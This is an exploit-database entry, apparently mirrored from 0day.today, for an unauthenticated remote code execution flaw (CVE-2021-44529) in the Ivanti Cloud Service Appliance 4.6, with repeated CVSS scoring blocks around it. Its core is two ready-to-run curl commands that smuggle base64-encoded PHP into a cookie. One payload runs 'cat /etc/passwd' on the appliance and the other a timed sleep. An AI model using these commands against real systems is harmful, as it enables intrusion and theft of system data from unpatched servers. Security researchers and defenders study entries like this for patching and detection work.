Lucene search

K
zdtD7x1337DAY-ID-37502
HistoryMar 22, 2022 - 12:00 a.m.

Ivanti Endpoint Manager 4.6 - Remote Code Execution Vulnerability

2022-03-2200:00:00
d7x
0day.today
300
ivanti endpoint manager
remote code execution
vulnerability
rce
cve-2021-44529

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.972

Percentile

99.9%

# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Exploit Author: d7x 
# Vendor Homepage: https://www.ivanti.com/ 
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 
# Version: CSA 4.6 4.5 - EOF Aug 2021 
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529

###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): 
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US

Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###

# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

# sleep for 10 seconds
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.972

Percentile

99.9%